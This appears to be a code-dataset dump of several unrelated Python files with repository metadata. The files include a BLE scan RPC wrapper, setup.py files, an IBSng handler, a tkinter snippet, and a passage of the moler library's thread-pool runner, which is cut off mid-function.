| 24.96 | 57 | 0.745192 | 87 | 624 | 5.183908 | 0.666667 | 0.066519 | 0.079823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019455 | 0.176282 | 624 | 24 | 58 | 26 | 0.857977 | 0.320513 | 0 | 0.181818 | 0 | 0 | 0.033573 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0.090909 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
d9ebd97390a108081d469a381a6c414e7e9ea419 | 1,210 | py | Python | libsrc/wio_terminal_rtl/rpc/ble/scan.py | t-ikegami/WioTerminal-CircuitPython | efbdc2e13ad969fe009d88f7ec4b836ca61ae973 | [
"MIT"
] | null | null | null | libsrc/wio_terminal_rtl/rpc/ble/scan.py | t-ikegami/WioTerminal-CircuitPython | efbdc2e13ad969fe009d88f7ec4b836ca61ae973 | [
"MIT"
] | 1 | 2022-01-19T00:16:02.000Z | 2022-01-26T03:43:34.000Z | libsrc/wio_terminal_rtl/rpc/ble/scan.py | t-ikegami/WioTerminal-CircuitPython | efbdc2e13ad969fe009d88f7ec4b836ca61ae973 | [
"MIT"
] | null | null | null | from .. import MTYPE_INVOKE, perform_request
from ...Codec import Codec
# rpc_le_scan_set_param(RPC_T_LE_SCAN_PARAM_TYPE param, in binary value) -> RPC_T_GAP_CAUSE
def set_param(param, value) :
codec = Codec(8, 1, MTYPE_INVOKE, "II{}", "I")
return perform_request(codec, param, value)
# rpc_le_scan_get_param(RPC_T_LE_SCAN_PARAM_TYPE param, out binary value) -> RPC_T_GAP_CAUSE
def get_param(param) :
codec = Codec(8, 2, MTYPE_INVOKE, "I", "I{}I")
return perform_request(codec, param)
# rpc_le_scan_start() -> RPC_T_GAP_CAUSE
def start() :
codec = Codec(8, 3, MTYPE_INVOKE, "", "I")
return perform_request(codec)
# rpc_le_scan_timer_start(uint32 tick) -> RPC_T_GAP_CAUSE
def timer_start(tick) :
codec = Codec(8, 4, MTYPE_INVOKE, "I", "I")
return perform_request(codec, tick)
# rpc_le_scan_stop() -> RPC_T_GAP_CAUSE
def stop() :
codec = Codec(8, 5, MTYPE_INVOKE, "", "I")
return perform_request(codec)
# rpc_le_scan_info_filter(bool enable, uint8 offset, uint8 len, in uint8[31] p_filter) -> bool
def info_filter(enable, offset, len, p_filter) :
codec = Codec(8, 6, MTYPE_INVOKE, "bBB31s", "b")
return perform_request(codec, enable, offset, len, p_filter)
| 35.588235 | 94 | 0.715702 | 197 | 1,210 | 4.050761 | 0.243655 | 0.06015 | 0.067669 | 0.18797 | 0.477444 | 0.365915 | 0.253133 | 0.18797 | 0.115288 | 0.115288 | 0 | 0.020568 | 0.156198 | 1,210 | 33 | 95 | 36.666667 | 0.761019 | 0.335537 | 0 | 0.1 | 0 | 0 | 0.026382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d9fb65dc25c5543de378cebe44e4b1b97b5e92e7 | 1,251 | py | Python | setup.py | logicai-io/python-json-logger | 85a9511536c2d9f437d9e54dc533f6c075d56136 | [
"BSD-2-Clause"
] | null | null | null | setup.py | logicai-io/python-json-logger | 85a9511536c2d9f437d9e54dc533f6c075d56136 | [
"BSD-2-Clause"
] | null | null | null | setup.py | logicai-io/python-json-logger | 85a9511536c2d9f437d9e54dc533f6c075d56136 | [
"BSD-2-Clause"
] | null | null | null | import sys
if sys.version_info < (2, 7):
print(sys.stderr, "{}: need Python 2.7 or later.".format(sys.argv[0]))
print(sys.stderr, "Your Python is {}".format(sys.version))
sys.exit(1)
from setuptools import setup, find_packages
setup(
name = "python-json-logger",
version = "0.1.9",
url = "http://github.com/madzak/python-json-logger",
license = "BSD",
description = "A python library adding a json log formatter",
author = "Zakaria Zajac",
author_email = "zak@madzak.com",
package_dir = {'': 'src'},
packages = find_packages("src", exclude="tests"),
test_suite = "tests.tests",
install_requires = ['setuptools'],
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Logging',
]
)
| 34.75 | 74 | 0.60032 | 142 | 1,251 | 5.239437 | 0.542254 | 0.178763 | 0.235215 | 0.139785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021097 | 0.242206 | 1,251 | 35 | 75 | 35.742857 | 0.763713 | 0 | 0 | 0 | 0 | 0 | 0.5004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.060606 | 0 | 0.060606 | 0.060606 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a050b03b37d4c7534396ecb8a7278a5ddb8495a | 550 | py | Python | {{cookiecutter.repo_name}}/setup.py | HemuManju/lightning-hydra-template | fee0d71f25b0a26c3047b2bf4d05834df8f70157 | [
"MIT"
] | null | null | null | {{cookiecutter.repo_name}}/setup.py | HemuManju/lightning-hydra-template | fee0d71f25b0a26c3047b2bf4d05834df8f70157 | [
"MIT"
] | null | null | null | {{cookiecutter.repo_name}}/setup.py | HemuManju/lightning-hydra-template | fee0d71f25b0a26c3047b2bf4d05834df8f70157 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='{{ cookiecutter.project_name }}',
version='0.0.0',
description='{{ cookiecutter.description }}',
author='{{ cookiecutter.author_name }}',
author_email='',
url='', # replace with your own github repo url
install_requires=['pytorch-lightning', 'hydra-core'],
packages=find_packages(),
license='{% if cookiecutter.open_source_license == 'MIT' %}MIT{% elif cookiecutter.open_source_license == 'BSD-3-Clause' %}BSD-3{% endif %}' # noqa
)
| 36.666667 | 151 | 0.674545 | 65 | 550 | 5.553846 | 0.646154 | 0.066482 | 0.121884 | 0.160665 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.154545 | 550 | 14 | 152 | 39.285714 | 0.765591 | 0.114545 | 0 | 0 | 0 | 0 | 0.483471 | 0.283058 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a0ac0d22efedb04ad9d5a3e84555805e4304b88 | 453 | py | Python | setup.py | Kraktoos/Python-Elo-System | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | 2 | 2021-10-20T18:35:59.000Z | 2021-10-31T19:56:36.000Z | setup.py | Kraktoos/elo_system | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | null | null | null | setup.py | Kraktoos/elo_system | 7396030c2e00d9464f9eef62020bc742b327dd3f | [
"MIT"
] | 1 | 2022-02-08T13:58:10.000Z | 2022-02-08T13:58:10.000Z | from setuptools import setup
setup(name="elo_system",
version="1.0",
description="Yet another Python Implementation of the Elo rating system.",
long_description="""
Yet another Python Implementation of the Elo rating system.
""",
author="Kraktoos",
author_email="kraktoos@gmail.com",
url="https://github.com/Kraktoos/elo_system",
include_package_data=True,
license="MIT",
) | 32.357143 | 81 | 0.642384 | 52 | 453 | 5.480769 | 0.634615 | 0.063158 | 0.147368 | 0.189474 | 0.42807 | 0.42807 | 0.42807 | 0.42807 | 0.42807 | 0.42807 | 0 | 0.005848 | 0.245033 | 453 | 14 | 82 | 32.357143 | 0.827485 | 0 | 0 | 0 | 0 | 0 | 0.480726 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a0ed597d40b8e2adc03dbad797c60dcb28ef47e | 165 | py | Python | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 5 | 2016-01-12T15:12:18.000Z | 2022-02-10T21:57:39.000Z | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 5 | 2015-01-20T04:22:50.000Z | 2018-10-02T19:39:12.000Z | genda/parsing/matrixtest.py | jeffhsu3/genda | 5adbb5b5620c592849fa4a61126b934e1857cd77 | [
"BSD-3-Clause"
] | 1 | 2022-03-04T06:49:39.000Z | 2022-03-04T06:49:39.000Z | from PWMparser import *
t = open("/home/hsuj/Downloads/All_PWMs/SCI09/Gcm1_pwm_primary.txt", 'rU')
index, matrix, size = uniProbe_parse(t)
print(matrix)
print(size)
| 27.5 | 74 | 0.757576 | 26 | 165 | 4.653846 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.090909 | 165 | 5 | 75 | 33 | 0.786667 | 0 | 0 | 0 | 0 | 0 | 0.351515 | 0.339394 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a14e3fa81291ae479bb2f7e62317024325cab7b | 515 | py | Python | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 6 | 2018-03-06T10:16:36.000Z | 2021-12-05T12:43:10.000Z | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-03-06T10:27:08.000Z | 2022-01-02T15:21:27.000Z | ibsng/handler/ldap/get_user_info.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-01-06T16:28:31.000Z | 2018-09-17T19:47:19.000Z | """Get user info API method."""
from ibsng.handler.handler import Handler
class getUserInfo(Handler):
"""Get user info method class."""
def control(self):
"""Validate inputs after setup method.
:return: None
:rtype: None
"""
self.is_valid(self.username, str)
def setup(self, username):
"""Setup required parameters.
:param str username: ibsng username
:return: None
:rtype: None
"""
self.username = username
| 20.6 | 46 | 0.586408 | 56 | 515 | 5.375 | 0.5 | 0.119601 | 0.07309 | 0.126246 | 0.152824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.302913 | 515 | 24 | 47 | 21.458333 | 0.83844 | 0.405825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8a1b7b3c2132b2942cc3026e54b6189a4e0cfd8d | 267 | py | Python | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null | eventextractiontool.py | Slark0/IE | 9e6b03be4a1ebce1632651a0042de7a602075205 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import *
# 导入tkinter模块的所有内容
root = Tk()
input = Entry(root)
input.pack(padx=200,pady=200)
input.delete(0, END) #先清空按照索引
input.insert(0,"请输入内容...")
root.mainloop()
| 12.136364 | 32 | 0.722846 | 38 | 267 | 5.078947 | 0.578947 | 0.170984 | 0.264249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.161049 | 267 | 21 | 33 | 12.714286 | 0.825893 | 0.086142 | 0 | 0 | 0 | 0 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8a27081321f363187f7d307940bfea675bffcedc | 32,556 | py | Python | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | 2 | 2021-03-14T15:17:10.000Z | 2021-03-15T07:12:12.000Z | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | null | null | null | moler/runner.py | Laymer/moler | 2d7b89efdc2ca5e9975112b97934b396e24b5505 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2018-2020 Nokia
"""
Runner abstraction goal is to hide concurrency machinery used
to make it exchangeable (threads, asyncio, twisted, curio)
"""
__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'
import atexit
import concurrent.futures
import logging
import threading
import time
from abc import abstractmethod, ABCMeta
from concurrent.futures import ThreadPoolExecutor, wait
from functools import partial
from six import add_metaclass
from moler.exceptions import CommandTimeout
from moler.exceptions import ConnectionObserverTimeout
from moler.exceptions import MolerException
from moler.exceptions import CommandFailure
from moler.util.loghelper import log_into_logger
@add_metaclass(ABCMeta)
class ConnectionObserverRunner(object):
@abstractmethod
def shutdown(self):
"""Cleanup used resources."""
@abstractmethod
def submit(self, connection_observer):
"""
Submit connection observer to background execution.
Returns Future that could be used to await for connection_observer done.
"""
@abstractmethod
def wait_for(self, connection_observer, connection_observer_future, timeout=10.0):
"""
Await for connection_observer running in background or timeout.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:param timeout: Max time (in float seconds) you want to await before you give up.
:return:
"""
@abstractmethod
def wait_for_iterator(self, connection_observer, connection_observer_future):
"""
Version of wait_for() intended to be used by Python3 to implement iterable/awaitable object.
Note: we don't have timeout parameter here. If you want to await with timeout please do use timeout machinery
of selected parallelism.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:return: iterator
"""
@abstractmethod
def feed(self, connection_observer):
"""
Feeds connection_observer with data to let it become done.
This is a place where runner is a glue between words of connection and connection-observer.
Should be called from background-processing of connection observer.
"""
@abstractmethod
def timeout_change(self, timedelta):
"""
Call this method to notify runner that timeout has been changed in observer
:param timedelta: delta timeout in float seconds
:return: None
"""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
return False # exceptions (if any) should be reraised
def time_out_observer(connection_observer, timeout, passed_time, runner_logger, kind="background_run"):
"""Set connection_observer status to timed-out"""
if not connection_observer.life_status.was_on_timeout_called:
connection_observer.life_status.was_on_timeout_called = True
if not connection_observer.done():
if hasattr(connection_observer, "command_string"):
exception = CommandTimeout(connection_observer=connection_observer,
timeout=timeout, kind=kind, passed_time=passed_time)
else:
exception = ConnectionObserverTimeout(connection_observer=connection_observer,
timeout=timeout, kind=kind, passed_time=passed_time)
# TODO: secure_data_received() may change status of connection_observer
# TODO: and if secure_data_received() runs inside threaded connection - we have race
connection_observer.set_exception(exception)
connection_observer.on_timeout()
observer_info = "{}.{}".format(connection_observer.__class__.__module__, connection_observer)
timeout_msg = "has timed out after {:.2f} seconds.".format(passed_time)
msg = "{} {}".format(observer_info, timeout_msg)
# levels_to_go_up: extract caller info to log where .time_out_observer has been called from
connection_observer._log(logging.INFO, msg, levels_to_go_up=2)
log_into_logger(runner_logger, level=logging.DEBUG,
msg="{} {}".format(connection_observer, timeout_msg),
levels_to_go_up=1)
def result_for_runners(connection_observer):
"""
When runner takes result from connection-observer it should not
modify ConnectionObserver._not_raised_exceptions
:param connection_observer: observer to get result from
:return: result or raised exception
"""
if connection_observer._exception:
raise connection_observer._exception
return connection_observer.result()
class CancellableFuture(object):
def __init__(self, future, observer_lock, stop_running, is_done, stop_timeout=0.5):
"""
Wrapper to allow cancelling already running concurrent.futures.Future
Assumes that executor submitted function with following parameters
fun(stop_running, is_done)
and that such function correctly handles that events (threading.Event)
:param future: wrapped instance of concurrent.futures.Future
:param stop_running: set externally to finish thread execution of function
:param is_done: set when function finished running in thread
:param stop_timeout: timeout to await is_done after setting stop_running
"""
self._future = future
self.observer_lock = observer_lock # against threads race write-access to observer
self._stop_running = stop_running
self._stop_timeout = stop_timeout
self._is_done = is_done
def __getattr__(self, attr):
"""Make it proxy to embedded future"""
attribute = getattr(self._future, attr)
return attribute
def __str__(self):
"""Make it proxy to embedded future"""
f_str = str(self._future)
return "CancellableFuture({})".format(f_str)
def cancel(self, no_wait=False):
"""
Cancel embedded future
:param no_wait: if True - just set self._stop_running event to let thread exit loop
:return:
"""
if self.running():
self._stop(no_wait)
if no_wait:
return True
# after exiting threaded-function future.state == FINISHED
# we need to change it to PENDING to allow for correct cancel via concurrent.futures.Future
with self._condition:
self._future._state = concurrent.futures._base.PENDING
return self._future.cancel()
def _stop(self, no_wait=False):
self._stop_running.set() # force threaded-function to exit
if no_wait:
return
if not self._is_done.wait(timeout=self._stop_timeout):
err_msg = "Failed to stop thread-running function within {} sec".format(self._stop_timeout)
# TODO: should we break current thread or just set this exception inside connection-observer
# (is it symetric to failed-start ?)
# may cause leaking resources - no call to moler_conn.unsubscribe()
raise MolerException(err_msg)
class ThreadPoolExecutorRunner(ConnectionObserverRunner):
def __init__(self, executor=None):
"""Create instance of ThreadPoolExecutorRunner class"""
self._tick = 0.005 # Tick for sleep or partial timeout
self._in_shutdown = False
self._i_own_executor = False
self._was_timeout_called = False
self.executor = executor
self.logger = logging.getLogger('moler.runner.thread-pool')
self.logger.debug("created")
atexit.register(self.shutdown)
if executor is None:
max_workers = 1000 # max 1000 threads in pool
try: # concurrent.futures v.3.2.0 introduced prefix we like :-)
self.executor = ThreadPoolExecutor(max_workers=max_workers, thread_name_prefix='ThrdPoolRunner')
except TypeError as exc:
if ('unexpected' in str(exc)) and ('thread_name_prefix' in str(exc)):
self.executor = ThreadPoolExecutor(max_workers=max_workers)
else:
raise
self.logger.debug("created own executor {!r}".format(self.executor))
self._i_own_executor = True
else:
self.logger.debug("reusing provided executor {!r}".format(self.executor))
def shutdown(self):
self.logger.debug("shutting down")
self._in_shutdown = True # will exit from feed() without stopping executor (since others may still use that executor)
if self._i_own_executor:
self.executor.shutdown() # also stop executor since only I use it
def submit(self, connection_observer):
"""
Submit connection observer to background execution.
Returns Future that could be used to await for connection_observer done.
"""
assert connection_observer.life_status.start_time > 0.0 # connection-observer lifetime should already been
# started
observer_timeout = connection_observer.timeout
remain_time, msg = his_remaining_time("remaining", timeout=observer_timeout,
from_start_time=connection_observer.life_status.start_time)
self.logger.debug("go background: {!r} - {}".format(connection_observer, msg))
# TODO: check dependency - connection_observer.connection
# Our submit consists of two steps:
# 1. _start_feeding() which establishes data path from connection to observer
# 2. scheduling "background feed" via executor.submit()
#
# By using the code of _start_feeding() we ensure that after submit() connection data could reach
# data_received() of observer - as it would be "virtually running in background"
# Another words, no data will be lost-for-observer between runner.submit() and runner.feed() really running
#
# We do not await here (before returning from submit()) for "background feed" to be really started.
# That is in sync with generic nature of threading.Thread - after thread.start() we do not have
# running thread - it is user responsibility to await for threads switch.
# User may check "if thread is running" via Thread.is_alive() API.
# For concurrent.futures same is done via future.running() API.
#
# However, lifetime of connection_observer starts in connection_observer.start().
# It gains it's own timer so that timeout is calculated from that connection_observer.life_status.start_time
# That lifetime may start even before this submit() if observer is command and we have commands queue.
#
# As a corner case runner.wait_for() may timeout before feeding thread has started.
stop_feeding = threading.Event()
feed_done = threading.Event()
observer_lock = threading.Lock() # against threads race write-access to observer
subscribed_data_receiver = self._start_feeding(connection_observer, observer_lock)
connection_observer_future = self.executor.submit(self.feed, connection_observer,
subscribed_data_receiver,
stop_feeding, feed_done, observer_lock)
if connection_observer_future.done():
# most probably we have some exception during submit(); it should be stored inside future
try:
too_early_result = connection_observer_future.result()
err_msg = "PROBLEM: future returned {} already in runner.submit()".format(too_early_result)
self.logger.debug("go background: {} - {}".format(connection_observer, err_msg))
except Exception as err:
err_msg = "PROBLEM: future raised {!r} during runner.submit()".format(err)
self.logger.warning("go background: {} - {}".format(connection_observer, err_msg))
self.logger.exception(err_msg)
raise
finalizer = partial(self._feed_finish_callback,
connection_observer=connection_observer,
subscribed_data_receiver=subscribed_data_receiver,
feed_done=feed_done, observer_lock=observer_lock)
connection_observer_future.add_done_callback(finalizer)
c_future = CancellableFuture(connection_observer_future, observer_lock,
stop_feeding, feed_done)
connection_observer.life_status.last_feed_time = time.time()
return c_future
def wait_for(self, connection_observer, connection_observer_future, timeout=None):
"""
Await for connection_observer running in background or timeout.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:param timeout: Max time (in float seconds) you want to await before you give up. If None then taken from connection_observer
:return:
"""
# TODO: calculate remaining timeout before logging + done(result/exception) info
if connection_observer.done():
# 1. done() might mean "timed out" before future created (future is None)
# Observer lifetime started with its timeout clock so, it might timeout even before
# future created by runner.submit() - may happen for nonempty commands queue
# 2. done() might mean "timed out" before future start
# Observer lifetime started with its timeout clock so, it might timeout even before
# connection_observer_future started - since future's thread might not get control yet
# 3. done() might mean "timed out" before wait_for()
# wait_for() might be called so late after submit() that observer already "timed out"
# 4. done() might mean have result or got exception
# wait_for() might be called so late after submit() that observer already got result/exception
#
# In all above cases we want to stop future if it is still running
self.logger.debug("go foreground: {} is already done".format(connection_observer))
self._cancel_submitted_future(connection_observer, connection_observer_future)
return None
max_timeout = timeout
observer_timeout = connection_observer.timeout
# we count timeout from now if timeout is given; else we use .life.status.start_time and .timeout of observer
start_time = time.time() if max_timeout else connection_observer.life_status.start_time
await_timeout = max_timeout if max_timeout else observer_timeout
if max_timeout:
remain_time, msg = his_remaining_time("await max.", timeout=max_timeout, from_start_time=start_time)
else:
remain_time, msg = his_remaining_time("remaining", timeout=observer_timeout, from_start_time=start_time)
self.logger.debug("go foreground: {} - {}".format(connection_observer, msg))
if connection_observer_future is None:
end_of_life, remain_time = await_future_or_eol(connection_observer, remain_time, start_time, await_timeout,
self.logger)
if end_of_life:
return None
if not self._execute_till_eol(connection_observer=connection_observer,
connection_observer_future=connection_observer_future,
max_timeout=max_timeout,
await_timeout=await_timeout,
remain_time=remain_time):
# code below is to close ConnectionObserver and future objects
self._end_of_life_of_future_and_connection_observer(connection_observer, connection_observer_future)
return None
def _execute_till_eol(self, connection_observer, connection_observer_future, max_timeout, await_timeout,
remain_time):
eol_remain_time = remain_time
# either we wait forced-max-timeout or we check done-status each 0.1sec tick
if eol_remain_time > 0.0:
future = connection_observer_future or connection_observer._future
assert future is not None
if max_timeout:
done, not_done = wait([future], timeout=remain_time)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
self._wait_for_time_out(connection_observer, connection_observer_future,
timeout=await_timeout)
if connection_observer.life_status.terminating_timeout > 0.0:
connection_observer.life_status.in_terminating = True
done, not_done = wait([future], timeout=connection_observer.life_status.terminating_timeout)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
else:
while eol_remain_time > 0.0:
done, not_done = wait([future], timeout=self._tick)
if (future in done) or connection_observer.done():
self._cancel_submitted_future(connection_observer, future)
return True
already_passed = time.time() - connection_observer.life_status.start_time
eol_timeout = connection_observer.timeout + connection_observer.life_status.terminating_timeout
eol_remain_time = eol_timeout - already_passed
timeout = connection_observer.timeout
remain_time = timeout - already_passed
if remain_time <= 0.0:
self._wait_for_time_out(connection_observer, connection_observer_future,
timeout=await_timeout)
if not connection_observer.life_status.in_terminating:
connection_observer.life_status.in_terminating = True
else:
self._wait_for_not_started_connection_observer_is_done(connection_observer=connection_observer)
return False
def _wait_for_not_started_connection_observer_is_done(self, connection_observer):
# Have to wait till connection_observer is done with terminaing timeout.
eol_remain_time = connection_observer.life_status.terminating_timeout
start_time = time.time()
while not connection_observer.done() and eol_remain_time > 0.0:
time.sleep(self._tick)
eol_remain_time = start_time + connection_observer.life_status.terminating_timeout - time.time()
def _end_of_life_of_future_and_connection_observer(self, connection_observer, connection_observer_future):
future = connection_observer_future or connection_observer._future
if future:
future.cancel(no_wait=True)
connection_observer.set_end_of_life()
@staticmethod
def _cancel_submitted_future(connection_observer, connection_observer_future):
future = connection_observer_future or connection_observer._future
if future and (not future.done()):
future.cancel(no_wait=True)
def _wait_for_time_out(self, connection_observer, connection_observer_future, timeout):
passed = time.time() - connection_observer.life_status.start_time
future = connection_observer_future or connection_observer._future
if future:
with future.observer_lock:
time_out_observer(connection_observer=connection_observer,
timeout=timeout, passed_time=passed,
runner_logger=self.logger, kind="await_done")
else:
# sorry, we don't have lock yet (it is created by runner.submit()
time_out_observer(connection_observer=connection_observer,
timeout=timeout, passed_time=passed,
runner_logger=self.logger, kind="await_done")
def wait_for_iterator(self, connection_observer, connection_observer_future):
"""
Version of wait_for() intended to be used by Python3 to implement iterable/awaitable object.
Note: we don't have timeout parameter here. If you want to await with timeout please do use timeout machinery
of selected parallelism.
:param connection_observer: The one we are awaiting for.
:param connection_observer_future: Future of connection-observer returned from submit().
:return: iterator
"""
while not connection_observer_future.done():
yield None
# return result_for_runners(connection_observer) # May raise too. # Python > 3.3
res = result_for_runners(connection_observer)
raise StopIteration(res) # Python 2 compatibility
def _start_feeding(self, connection_observer, observer_lock):
"""
Start feeding connection_observer by establishing data-channel from connection to observer.
"""
def secure_data_received(data, timestamp):
try:
if connection_observer.done() or self._in_shutdown:
return # even not unsubscribed secure_data_received() won't pass data to done observer
with observer_lock:
connection_observer.data_received(data, timestamp)
connection_observer.life_status.last_feed_time = time.time()
except Exception as exc: # TODO: handling stacktrace
# observers should not raise exceptions during data parsing
# but if they do so - we fix it
with observer_lock:
self.logger.warning("Unhandled exception from '{} 'caught by runner.".format(connection_observer))
ex_msg = "Unexpected exception from {} caught by runner when processing data >>{}<< at '{}':" \
" >>>{}<<< -> repr: >>>{}<<<".format(connection_observer, data, timestamp, exc, repr(exc))
if connection_observer.is_command():
ex = CommandFailure(command=connection_observer, message=ex_msg)
else:
ex = MolerException(ex_msg)
connection_observer.set_exception(ex)
finally:
if connection_observer.done() and not connection_observer.cancelled():
if connection_observer._exception:
self.logger.debug("{} raised: {!r}".format(connection_observer, connection_observer._exception))
else:
self.logger.debug("{} returned: {}".format(connection_observer, connection_observer._result))
moler_conn = connection_observer.connection
self.logger.debug("subscribing for data {}".format(connection_observer))
with observer_lock:
moler_conn.subscribe(observer=secure_data_received,
connection_closed_handler=connection_observer.connection_closed_handler)
# after subscription we have data path so observer is started
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
connection_observer._log(logging.INFO, "{} started, {}".format(connection_observer.get_long_desc(), msg))
if connection_observer.is_command():
connection_observer.send_command()
return secure_data_received # to know what to unsubscribe
def _stop_feeding(self, connection_observer, subscribed_data_receiver, feed_done, observer_lock):
with observer_lock:
if not feed_done.is_set():
moler_conn = connection_observer.connection
self.logger.debug("unsubscribing {}".format(connection_observer))
moler_conn.unsubscribe(observer=subscribed_data_receiver,
connection_closed_handler=connection_observer.connection_closed_handler)
# after unsubscription we break data path so observer is finished
remain_time, msg = his_remaining_time("remaining", timeout=connection_observer.timeout,
from_start_time=connection_observer.life_status.start_time)
connection_observer._log(logging.INFO,
"{} finished, {}".format(connection_observer.get_short_desc(), msg))
feed_done.set()
def _feed_finish_callback(self, future, connection_observer, subscribed_data_receiver, feed_done, observer_lock):
"""Callback attached to concurrent.futures.Future of submitted feed()"""
